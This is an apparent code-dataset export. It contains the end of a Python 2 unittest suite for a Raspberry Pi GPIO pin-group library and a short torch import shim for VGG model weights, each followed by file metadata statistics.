def test_open_pin_for_reading_integer_mode_creates_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rI'),pingroup.PinWordReader)
def test_open_pin_for_reading_nonblocking_integer_mode_creates_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rNI'),pingroup.PinWordReader)
def test_open_pin_default_mode_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()]),pingroup.PinWordReader)
def test_open_pin_empty_mode_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],''),pingroup.PinWordReader)
def test_open_pin_for_reading_sequence_mode_creates_creates_PinListReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rS'),pingroup.PinListReader)
def test_open_pin_for_reading_nonblocking_sequence_mode_creates_creates_PinListReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rNS'),pingroup.PinListReader)
def test_open_pin_for_reading_blockonfallingedge_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rF'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonrisingedge_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rR'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonbothedges_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rB'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonfallingedge_integer_mode_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rFI'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonrisingedge_integer_mode_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rRI'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonbothedges_integer_mode_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rBI'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonfallingedge_sequence_mode_creates_PinListBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rFS'),pingroup.PinListBlockingReader)
def test_open_pin_for_reading_blockonrisingedge_sequence_mode_creates_PinListBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rRS'),pingroup.PinListBlockingReader)
def test_open_pin_for_reading_blockonbothedges_sequence_mode_creates_PinListBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rBS'),pingroup.PinListBlockingReader)
class PinWordReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinWordReader([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinWordReader([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinWordReader([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinWordReader([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinWordReader([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read()
def test_read_returns_integer_type(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
self.assertIsInstance(a_pin_group.read(), (int,long))
a_pin_group.close()
class PinListReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinListReader([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinListReader([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinListReader([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinListReader([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinListReader([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinListReader([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read()
def test_read_returns_iterable_type(self):
a_pin_group = pingroup.PinListReader([23,4,7])
self.assertIsInstance(a_pin_group.read(), collections.Iterable)
a_pin_group.close()
class PinWordBlockingReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(23,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(None,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(1.234,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(False,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([],'B')
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([-1],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(["Nan"],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader("Nan",'B') # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([100000],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([None],'B')
def test_invalid_blocking_mode_fail_pin_creation(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([7],'N')
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([7],'X')
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinWordBlockingReader([7],23)
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinWordBlockingReader([7],[5])
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinWordBlockingReader([7],None)
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinWordBlockingReader([4,23,23],'B')
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinWordBlockingReader([23,4],'B')
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinWordBlockingReader([23,4,7],'B') as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinWordBlockingReader([23,4,7],'B')
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read(0)
def test_polled_read_returns_integer_type(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
self.assertIsInstance(a_pin_group.read(0), (int,long))
a_pin_group.close()
def test_timeout_read_returns_None(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.read(0) # reset initial signalled states
self.assertIsNone(a_pin_group.read(0.001))
a_pin_group.close()
class PinListBlockingReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(23,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(None,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(1.234,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(False,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([],'B')
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([-1],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(["Nan"],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader("Nan",'B') # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([100000],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([None],'B')
def test_invalid_blocking_mode_fail_pin_creation(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([7],'N')
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([7],'X')
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinListBlockingReader([7],23)
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinListBlockingReader([7],[5])
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinListBlockingReader([7],None)
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinListBlockingReader([4,23,23],'B')
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinListBlockingReader([23,4],'B')
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinListBlockingReader([23,4,7],'B') as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinListBlockingReader([23,4,7],'B')
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read(0)
def test_polled_read_returns_iterable_type(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
self.assertIsInstance(a_pin_group.read(0), collections.Iterable)
a_pin_group.close()
def test_timeout_read_returns_None(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.read(0) # reset initial signalled states
self.assertIsNone(a_pin_group.read(0.001))
a_pin_group.close()
class PinWordWriterPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinWordWriter([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinWordWriter([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinWordWriter([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinWordWriter([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinWordWriter([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.write(0)
def test_write_non_scalar_value_raises_TypeError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
with self.assertRaises( TypeError ):
a_pin_group.write(["Nan"])
with self.assertRaises( TypeError ):
a_pin_group.write([1,0,1])
with self.assertRaises( TypeError ):
a_pin_group.write([True, False, True])
a_pin_group.close()
def test_write_scalar_value_not_convertible_to_integer_raises_ValueError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
with self.assertRaises( ValueError ):
a_pin_group.write("Nan")
a_pin_group.close()
def test_write_out_of_range_value_raises_ValueError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
with self.assertRaises( ValueError ):
a_pin_group.write(-1)
with self.assertRaises( ValueError ):
a_pin_group.write(8)
a_pin_group.close()
class PinListWriterPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinListWriter([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinListWriter([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinListWriter([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinListWriter([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinListWriter([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.write([0,0,0])
def test_write_non_iterable_value_raises_TypeError(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
with self.assertRaises( TypeError ):
a_pin_group.write(1)
with self.assertRaises( TypeError ):
a_pin_group.write(False)
with self.assertRaises( TypeError ):
a_pin_group.write(None)
with self.assertRaises( TypeError ):
a_pin_group.write(set([True, False, True]))
a_pin_group.close()
def test_write_iterable_wrong_number_of_elements_raises_TypeError(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
with self.assertRaises( TypeError ):
a_pin_group.write([])
with self.assertRaises( TypeError ):
a_pin_group.write([1])
with self.assertRaises( TypeError ):
a_pin_group.write([1,2])
with self.assertRaises( TypeError ):
a_pin_group.write([1,2,3,4])
a_pin_group.close()
def test_write_iterable_right_number_of_elements_raises_nothing(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.write([False,0,[]])
a_pin_group.close()
# Allow the test module to be run directly as a script.
if __name__ == '__main__':
    unittest.main()
| 47.717722
| 123
| 0.703345
| 4,621
| 37,697
| 5.390175
| 0.053452
| 0.095712
| 0.100811
| 0.092822
| 0.96198
| 0.947888
| 0.938654
| 0.92388
| 0.889393
| 0.856994
| 0
| 0.017897
| 0.198132
| 37,697
| 789
| 124
| 47.7782
| 0.806107
| 0.027774
| 0
| 0.673846
| 0
| 0
| 0.013198
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 0
| null | null | 0
| 0.012308
| null | null | 0.010769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
797c55f617cfad4667d533c21de754ba3cd474f5
| 177
|
py
|
Python
|
src/utils/vgg_utils.py
|
shendu-sw/TFR-HSS-Benchmark
|
3fbc93ff548d924050e2de5070007197f04be7f4
|
[
"MIT"
] | 7
|
2021-08-24T10:01:28.000Z
|
2021-12-29T07:13:17.000Z
|
src/utils/vgg_utils.py
|
idrl-lab/TFR-HSS-Benchmark
|
3fbc93ff548d924050e2de5070007197f04be7f4
|
[
"MIT"
] | null | null | null |
src/utils/vgg_utils.py
|
idrl-lab/TFR-HSS-Benchmark
|
3fbc93ff548d924050e2de5070007197f04be7f4
|
[
"MIT"
] | 1
|
2021-08-25T01:38:39.000Z
|
2021-08-25T01:38:39.000Z
|
# -*- encoding: utf-8 -*-
# Compatibility shim: prefer torch.hub.load_state_dict_from_url and, on
# torch versions where it is unavailable, fall back to the older
# torch.utils.model_zoo.load_url under the same name so the rest of the
# module can use one import regardless of the installed torch release.
try:
    from torch.hub import load_state_dict_from_url
except ImportError:
    from torch.utils.model_zoo import load_url as load_state_dict_from_url
| 29.5
| 74
| 0.774011
| 29
| 177
| 4.37931
| 0.62069
| 0.141732
| 0.204724
| 0.267717
| 0.314961
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006623
| 0.146893
| 177
| 5
| 75
| 35.4
| 0.834437
| 0.129944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.